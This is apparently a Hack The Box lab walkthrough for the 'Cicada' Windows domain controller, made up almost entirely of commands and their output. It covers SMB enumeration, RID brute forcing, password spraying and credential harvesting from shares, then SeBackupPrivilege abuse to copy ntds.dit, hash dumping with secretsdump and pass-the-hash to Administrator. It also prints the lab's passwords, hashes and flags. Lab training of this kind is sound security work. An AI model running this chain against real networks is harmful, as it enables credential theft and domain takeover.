Cicada

Cicada HTB Detailed Walkthrough

Initial Enumeration with Nmap

sudo nmap -p- -sVC 10.129.190.226

Output: Ports open include:

53 (DNS)
88 (Kerberos)
135, 139, 445 (SMB, RPC)
389/636 (LDAP/LDAPS)
3268/3269 (Global Catalog LDAP)
5985 (WinRM)
64827 (MSRPC)

Important service: LDAP Domain: cicada.htb, Host: CICADA-DC, OS: Windows Server 2022

Enumerate SMB Shares (Anonymous)

nxc smb 10.129.190.226 --shares

Error: STATUS_USER_SESSION_DELETED

Try with anonymous:

nxc smb 10.129.190.226 -u '.' -p '' --shares

Output: Shares found: ADMIN$, C$, DEV, HR, IPC$, NETLOGON, SYSVOL

smbclient -U '.' //10.129.190.226/HR

mget "Notice from HR.txt"

File Content: Default password provided: Cicada$M6Corpb*@Lp#nZp!8

RID Brute Force Users

nxc smb 10.129.190.226 -u '.' -p '' --rid-brute

Discovered Users: john.smoulder, sarah.dantelia, michael.wrightson, david.orelious, emily.oscars, etc.

Prepare User List and Password Spray

cat > users.txt <<EOF
Administrator
Guest
krbtgt
CICADA-DC$
john.smoulder
sarah.dantelia
michael.wrightson
david.orelious
emily.oscars
EOF

nxc smb 10.129.190.226 -u users.txt -p 'Cicada$M6Corpb*@Lp#nZp!8'

Valid login: michael.wrightson

Enumerate More Users (with Valid Creds)

nxc smb 10.129.190.226 -u 'michael.wrightson' -p 'Cicada$M6Corpb*@Lp#nZp!8' --users

Found Note in Description: david.orelious: Just in case I forget my password is aRt$Lp#7t*VQ!3

smbclient -U 'david.orelious' //10.129.190.226/DEV

mget Backup_script.ps1

Content Reveals Credentials: User: emily.oscars, Pass: Q!3@Lp#M6b*7t*Vt

Access C$ and Retrieve user.txt

smbclient -U 'emily.oscars' //10.129.190.226/C$
cd Users/emily.oscars.CICADA/Desktop
mget user.txt

Spawn Shell with Evil-WinRM

evil-winrm -i 10.129.190.226 -u 'emily.oscars' -p 'Q!3@Lp#M6b*7t*Vt'

Dump Local Hashes (SAM & SYSTEM)

reg save HKLM\SAM SAM
reg save HKLM\SYSTEM SYSTEM
download sam
download system

secretsdump local -sam sam -system system

NT Hash Recovered: Administrator:2b87e7c93a3e8a0ea4a581937016f341

Confirm Administrator Access

nxc smb 10.129.190.226 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341

Access Confirmed

Exploit SeBackupPrivilege (VSS Shadow Copy)

Create diskshadow script:

set verbose on
set metadata C:\Windows\Temp\meta.cab
set context clientaccessible
set context persistent
begin backup
add volume C: alias cdrive
create
expose %cdrive% E:
end backup

Convert & Upload:

unix2dos diskshadow.txt
upload diskshadow.txt

Run diskshadow:

diskshadow /s diskshadow.txt

Copy ntds.dit:

robocopy /b E:\Windows\ntds . ntds.dit
download ntds.dit

Dump Domain Secrets

secretsdump local -system system -ntds ntds.dit

Confirms Administrator and domain user hashes.

Administrator WinRM Access & Root Flag

evil-winrm -i 10.129.190.226 -u Administrator -H 2b87e7c93a3e8a0ea4a581937016f341
cd \Users\Administrator\Desktop
cat root.txt

Root Flag: 8921a5862c5fb0324cac27bcd44a833c

PreviousEASY NextMedium

Last updated 10 months ago

hashtagCicada HTB Detailed Walkthrough

hashtagInitial Enumeration with Nmap

hashtagEnumerate SMB Shares (Anonymous)

hashtagAccess HR Share

hashtagRID Brute Force Users

hashtagPrepare User List and Password Spray

hashtagEnumerate More Users (with Valid Creds)

hashtagAccess DEV Share with david.orelious

hashtagAccess C$ and Retrieve user.txt

hashtagSpawn Shell with Evil-WinRM

hashtagDump Local Hashes (SAM & SYSTEM)

hashtagConfirm Administrator Access

hashtagExploit SeBackupPrivilege (VSS Shadow Copy)

hashtagDump Domain Secrets

hashtagAdministrator WinRM Access & Root Flag